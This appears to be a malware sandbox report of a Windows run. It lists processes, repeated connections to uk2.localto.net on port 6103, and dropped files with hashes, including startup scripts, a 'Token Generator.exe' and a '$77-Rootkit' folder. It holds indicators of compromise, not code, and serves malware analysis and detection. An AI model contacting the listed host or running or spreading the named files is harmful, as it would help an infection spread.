"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5552 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6676 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15632921161179447328,3626109559833208627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3544 /prefetch:8

C:\Users\Admin\Downloads\MBSetup.exe

"C:\Users\Admin\Downloads\MBSetup.exe"

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe

"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 uk2.localto.net udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
IE 20.190.159.73:443 login.microsoftonline.com tcp
US 8.8.8.8:53 www.malwarebytes.com udp
US 192.0.66.233:443 www.malwarebytes.com tcp
US 192.0.66.233:443 www.malwarebytes.com tcp
US 8.8.8.8:53 services.bingapis.com udp
US 8.8.8.8:53 dev.visualwebsiteoptimizer.com udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 8.8.8.8:53 stats.wp.com udp
US 8.8.8.8:53 plausible.io udp
GB 143.244.38.136:443 plausible.io tcp
US 8.8.8.8:53 233.66.0.192.in-addr.arpa udp
US 8.8.8.8:53 137.102.96.34.in-addr.arpa udp
US 8.8.8.8:53 42.215.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 136.38.244.143.in-addr.arpa udp
GB 143.244.38.136:443 plausible.io tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com udp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com udp
US 8.8.8.8:53 genesis.malwarebytes.com udp
US 54.225.65.73:443 genesis.malwarebytes.com tcp
US 34.96.102.137:443 dev.visualwebsiteoptimizer.com tcp
US 192.0.76.3:443 stats.wp.com tcp
US 192.0.76.3:443 stats.wp.com tcp
US 8.8.8.8:53 73.65.225.54.in-addr.arpa udp
US 8.8.8.8:53 3.76.0.192.in-addr.arpa udp
US 8.8.8.8:53 cdn.cookielaw.org udp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 52.178.19.104.in-addr.arpa udp
US 104.19.178.52:443 cdn.cookielaw.org tcp
US 8.8.8.8:53 geolocation.onetrust.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 pixel.wp.com udp
US 104.18.33.89:443 www2.bing.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 172.64.155.119:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 api.demandbase.com udp
US 8.8.8.8:53 89.33.18.104.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 119.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 www-api.malwarebytes.com udp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
US 18.245.199.30:443 www-api.malwarebytes.com tcp
FR 18.164.52.107:443 api.demandbase.com tcp
FR 18.164.52.107:443 api.demandbase.com tcp
US 8.8.8.8:53 107.52.164.18.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 api2.amplitude.com udp
US 35.164.70.144:443 api2.amplitude.com tcp
US 8.8.8.8:53 144.70.164.35.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 8.8.8.8:53 ark.mwbsys.com udp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.41:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 79.191.225.54.in-addr.arpa udp
US 8.8.8.8:53 41.91.86.99.in-addr.arpa udp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.87:443 cdn.mwbsys.com tcp
US 8.8.8.8:53 87.91.86.99.in-addr.arpa udp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.41:443 cdn.mwbsys.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
US 54.225.191.79:443 ark.mwbsys.com tcp
US 8.8.8.8:53 cdn.mwbsys.com udp
FR 99.86.91.41:443 cdn.mwbsys.com tcp
GB 140.238.91.110:6103 uk2.localto.net tcp
GB 140.238.91.110:6103 uk2.localto.net tcp

Files

memory/2756-0-0x00007FFD6E1A3000-0x00007FFD6E1A5000-memory.dmp

memory/2756-6-0x00000239F15B0000-0x00000239F15D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nsobb0z2.n12.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2756-11-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/2756-12-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/2756-13-0x00000239EEDF0000-0x00000239EEDF8000-memory.dmp

memory/2756-14-0x00000239F99F0000-0x00000239F9E8E000-memory.dmp

memory/1188-25-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/1188-26-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/1188-27-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/1188-30-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

C:\Users\Admin\AppData\Roaming\startup_str_33.vbs

MD5 e54e8261acfbe96de2fd1d3a67ab9cc7
SHA1 a14a733b7db143cd1cdbd0fc2302b60447dd0ac4
SHA256 2f80f19c84919d0232943292bb3aee695f852dffbdcf4e70fb86039c6e430c8a
SHA512 f6f0bef9a17d4e367264db359ec1979983f286a398bae678ed8baadbc0cf6fc490c84317832031cc29f7d2d8bc8da6c2972b8461d59a295ec5e6ff7f41477af5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 773440cd6eb4e778c7d2115d1f231f75
SHA1 4b600aa41fcd267817961c95b104a0717c40e558
SHA256 64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c
SHA512 af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

C:\Users\Admin\AppData\Roaming\startup_str_33.bat

MD5 e984ebea899379a8c0a47f9308c7370b
SHA1 863330006bef4c55a1bc79771ae989dc0412f717
SHA256 9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
SHA512 70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975

memory/2756-49-0x00007FFD6E1A0000-0x00007FFD6EC61000-memory.dmp

memory/4592-54-0x000001F3E03D0000-0x000001F3E06F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 b51552b77057c2405f73bbbf9c89234a
SHA1 4793adbba023f90d2d2ad0ec55199c56de815224
SHA256 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

C:\Users\Admin\AppData\Local\Temp\Token Generator.exe

MD5 6d2ad4ada4961027832e557db06fc08d
SHA1 816018499f5e291850d7dd2a0d15c914e5607630
SHA256 139ce0f6ed1d745a6776f831c641b2b30bb8d48ecd9c198a0b4bd8489899f60e
SHA512 1d99985c99fa16f712eee5604279463e18e77532e7a1586651178685ef38ba25b099c393edc44f2703d7e9f4ce7596b86ba3d9f0e00119e13474816a2186f241

memory/4932-72-0x00000000006E0000-0x0000000000A04000-memory.dmp

C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/4860-88-0x0000022A3F940000-0x0000022A3F96A000-memory.dmp

memory/4860-90-0x00007FFD8BEC0000-0x00007FFD8BF7E000-memory.dmp

memory/4860-89-0x00007FFD8C6B0000-0x00007FFD8C8A5000-memory.dmp

memory/3524-94-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-96-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-93-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-92-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-91-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3524-100-0x00007FFD8BEC0000-0x00007FFD8BF7E000-memory.dmp

memory/3524-99-0x00007FFD8C6B0000-0x00007FFD8C8A5000-memory.dmp

memory/624-106-0x0000026578650000-0x000002657867A000-memory.dmp

memory/624-112-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/340-141-0x000001DDBEE60000-0x000001DDBEE8A000-memory.dmp

memory/340-142-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/960-132-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/960-131-0x0000021AC4410000-0x0000021AC443A000-memory.dmp

memory/960-126-0x0000021AC4410000-0x0000021AC443A000-memory.dmp

memory/340-136-0x000001DDBEE60000-0x000001DDBEE8A000-memory.dmp

memory/684-122-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/64-152-0x00007FFD4C730000-0x00007FFD4C740000-memory.dmp

memory/64-151-0x000002917CF70000-0x000002917CF9A000-memory.dmp

memory/64-146-0x000002917CF70000-0x000002917CF9A000-memory.dmp

memory/684-121-0x00000165F6AD0000-0x00000165F6AFA000-memory.dmp

memory/684-116-0x00000165F6AD0000-0x00000165F6AFA000-memory.dmp

memory/624-111-0x0000026578650000-0x000002657867A000-memory.dmp

memory/624-105-0x0000026578650000-0x000002657867A000-memory.dmp

memory/624-104-0x0000026578280000-0x00000265782A5000-memory.dmp

memory/3524-101-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3380-829-0x000000001B970000-0x000000001B9C0000-memory.dmp

memory/3380-830-0x000000001DB20000-0x000000001DBD2000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 44f6efdb48829d5f3ea9f906e38577f3
SHA1 7393c5041171df0abb63d5ab3c3ca1d6fb16f7c9
SHA256 2ef83506a9e2573d640b2d2ee44f0249a0c05af64cb47b6c5b5b82db8609afa7
SHA512 0a9d6d2ac5e3fdd5b94457e19014771e7ba87d969a394895952908361cd28fad53958720859c7839bb1ada0eb316b5bee161a81d33b4b6a0783d6caa20647dc7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b2a1398f937474c51a48b347387ee36a
SHA1 922a8567f09e68a04233e84e5919043034635949
SHA256 2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6
SHA512 4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c

\??\pipe\LOCAL\crashpad_4772_VWWUCWXTEPFHAMKA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1ac52e2503cc26baee4322f02f5b8d9c
SHA1 38e0cee911f5f2a24888a64780ffdf6fa72207c8
SHA256 f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4
SHA512 7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5731d795d71971e52b40b7c55cdef698
SHA1 5f1a9ee502d2d57dfd6443f89a282334aa37cf0f
SHA256 13d578ee1bd007ffbf4e5c8cb0b482498b6f828fc1c7290b3acf52684f580c41
SHA512 3cf1c2755668789779eed97ce628f87925e6429eeec6ebd0f22b11fe950a6fb2a36db89a3f0df8021895f6f332154d56283ff5fb2df86c26ce4489be0cf3db0c

memory/3380-928-0x000000001E450000-0x000000001E978000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3579e069ca540bfd1b563efb885cf1e5
SHA1 78ae9ef7462aee2fdb96e6b27572c78453b559db
SHA256 bf81c20c915a56bb6711a67c698dfd901034e63f16eb7229a40a65989b9a7960
SHA512 5eb2a64ea5edc4c222188c98568011058851376bff028481b1b619ad13c79fc8bda9532bf82e5970c3088379f5a3df35359410c067a9b1d48fa8a45c5b1c8c51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 353d7a19aa651ac6d6352de6aaf0eded
SHA1 6ceb4279a37d6993b1cfbcdc96a1523230f5eaab
SHA256 70a6df6f3f32954b470e60cc725aaf9ef0ab35f240e87dd6b07e84b5185c5de3
SHA512 585c91ae95caaf8fba65ea672545670078b7f77f68de4889910dd4578c68eb613615044095d047e1046f4367520301d786e7ce471b2c2a17bb72648ab02c2088

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 4fb719e73f3871cdea53cb2512bed553
SHA1 9faa8307a990e55fc2f10d0734915b294a4a7426
SHA256 5c17f8a87cbbf7340a4ade49431daf6c37fde44ecc82c67ce516d0a624caa271
SHA512 9a27278cda83d6635bbab0c812530506c09f8d4ffe95198d18a51a86d49fe9d13437c5f923c18402fc4a84ede5a8ce74029665ed99d0c954c547fd9e53c89883

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4d965c501f00fc4724e933f77928adc5
SHA1 8ea7071386b3784add3f03cebf213ea0af6d3671
SHA256 ba76307a3441ae60acfc5b1731295d5cc42998cf6b841e29c14c348a2a09780d
SHA512 123d5d01c4fd27aae1dae7d110b9d948160e308adf83c9b1083446fa703b220c15642d91352d2af2574e232d22d710fe5b1f5545bb480383db8515b1da8c9fd2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57ea41.TMP

MD5 6e89ddd0ca790011f3c6942e79708dec
SHA1 1da67f9091c5aa8e293232365754ee1d61d192e2
SHA256 45b3653e3bf382d23889bad1ccb360f1cc4e55f9b0eebfcdb76b8cf99e450c10
SHA512 cf6115c1183495ebd26beac3c1e0641182da6efad7cc1181a9c8731cae028d60181c48d1568c6e338892666f4aec47431222692facefca09392bff3f6536dba8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5dadef3a499a9ee3c6a2793df0adfc9c
SHA1 695a7d6b52fb3154c334d77887719640d73e1fb3
SHA256 0e4f9cc38e81f06bfd97e3cc8b6f186677366fd316345ac80bb9e89d23c5cbee
SHA512 3c9f5d3cd22e52e575432471f4f9ac2c79bf9c96ef981993aa818b02783d34a5fa604e8f2029928d9739fcf7ba5e6b3a5cc9a89e194d89aec09acda6c7735e7f

C:\Users\Admin\Downloads\MBSetup.exe

MD5 6107ffe4a1a1ee9eb2453ca669791ac9
SHA1 8f69617ffd69adab260500ec25d5ae50cc49b882
SHA256 3c68baabc345c58d95825e548a395d305775b7f0313ec42997c17870ea6a458f
SHA512 305ed565d5b61271e3deac9ab254ce2d70c031f4713c9b37212ea56ff061b8ce0afb5002c02a5252991c506d217f3f6aad439c192384646432f2ae71c252fb56

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 cfc2155d28413b5bd6e61cc66f6e4e81
SHA1 1d83d1c508574c5a08f0d637745f11f3c5f85c03
SHA256 0f98ddfb1c206dccfcfb2e1c068b2408be8d36a258c205229078175a304afca7
SHA512 c5415a2dde8aa32410034ee44bb819e2e17ed2869e54c9baca5e729dfce686b8bdfbd4dafc9effefce2af841b86815c70858dffe97b1ef211c093d32e9bb03ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b5ace956334a3a1f33104605d6ed1eaa
SHA1 823ce8c2eb232bee4677058e6ee2a007e18bb1e9
SHA256 04319f85b3710e0a8fcb2294ce6184eb02426a7f73dd3f5f0164bfb714fa5d9d
SHA512 79efe441f269ea8e853a442a769e7ef12c01c046de2dec368cdfd28be8522d96bf141dfe71c5e629efa1936f8cca00f95b7f09fede19af0bb9896d6599cef73f

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 5c4ed3fd5d4318fe8ffd4cd54be345cf
SHA1 78976d9a5882a2f144a6afe8ae266570d80df3e9
SHA256 88881a7c48b9dc896927ee824e59eff9ab27c18418e6d9281d1dc4977d7ba586
SHA512 6f9aeaa6944f71555890a44e872d4eb8728122ca1cf1ddffb3fdc22cf4b10e99f43e92dabe3a1e434734d6c677eae7d487fce4102d5045d6ba7477423f85302a

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe

MD5 a545b29abb9db951e9e2508a1bbc8d2a
SHA1 061494912b29c965638263b7321a54b9e0399417
SHA256 7607ca2abc8f5dfe7a100ccf73d885375ec599b0648ebd964ffb8bff39c821df
SHA512 e7e33f5e49570ea74d427e12c049a7f0f89f7e4d3c7c511f59170cfb166bb5dd49ebfaa5a968dfdc15758f3177d7d39beebce26e593629aa0eac630748b403f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 a32daf4d026b1eb631484bd31df1a12d
SHA1 0fbc48c12782c4bfcc0f16ec6cf1cd818d72b33c
SHA256 b561480fb3e23940879d91fbc48a27229efdab3b12354b15680e5bb660540c22
SHA512 694cd5c69a738ae2c7ebb1d125b880dd93f6a283667a9ca18289a48d658d8490e0721f73104160086ee3b678cb84cd5da1285df50001374733430e033c8bb668

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90

MD5 ca401ed0f6d72ecb36603df52e549877
SHA1 69e7b365c32ef2b2ccf4673073378fcb224a77da
SHA256 043d123aa9217dcc977d84df863e0bd18c4f3063e29b145ad20a7812a8d3a37d
SHA512 2797223e47a3cb3af1116dcd37cba675be7533328d034e5dbc6f332a33d1adde499663dbee392a4dd5fc97de6bf04ed357a458171e61af6dfb040ea1372f0a7e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

MD5 f69555dad7587f03ed3c65cae3241a99
SHA1 2ff8ea1e1fca37f952537dc72d596733d11c10b5
SHA256 6bafeaeba74d0551c9ab96519ef4387f7b52afd919354924f69dd1bb6429c361
SHA512 b35451522315e01c5cae0ca7f44e24499fe31140347804e2ef41dd261db4fd9940963822c0286cdef7d7557243daa9c8f4913e286e5765f8e14aa7449d9cc9e5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

MD5 966e3ab17eeb2f84299793a0bd1406c3
SHA1 66f84a8c01efb963a1b771c42f9a8f309ab98ac2
SHA256 d9db9b3d916785cec070bb305e18ede6617a8bbb14ec7956728bc6c9afe878f2
SHA512 c4701bd64701c59ed9e6afaf3cc32e4c64ded17d5de6036616495c7833a41da76947f70a87a5199884a6a06beca8b6e9b3a5b67e80ba6d3a358a3b9a95aa650f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\38D10539991D1B84467F968981C3969D_C92678066E2B4B4986BC7641EEC08637

MD5 301afb7160b629147c36f2e75980bae9
SHA1 9d0f76e117b9179705a3c82455b670fd4471ca70
SHA256 5667ba628770d5be7e634ea6bdffe9f7abcf027f02ad37d1b94defff269d3e87
SHA512 f07044cae2dead59b4fcca0a068b5ad63f589ea0864838f8773e41971b24e342b0dc59f5b275748d93ad17718fc9edbfa3db22d27bc2896dcf1ffd7350ab1a44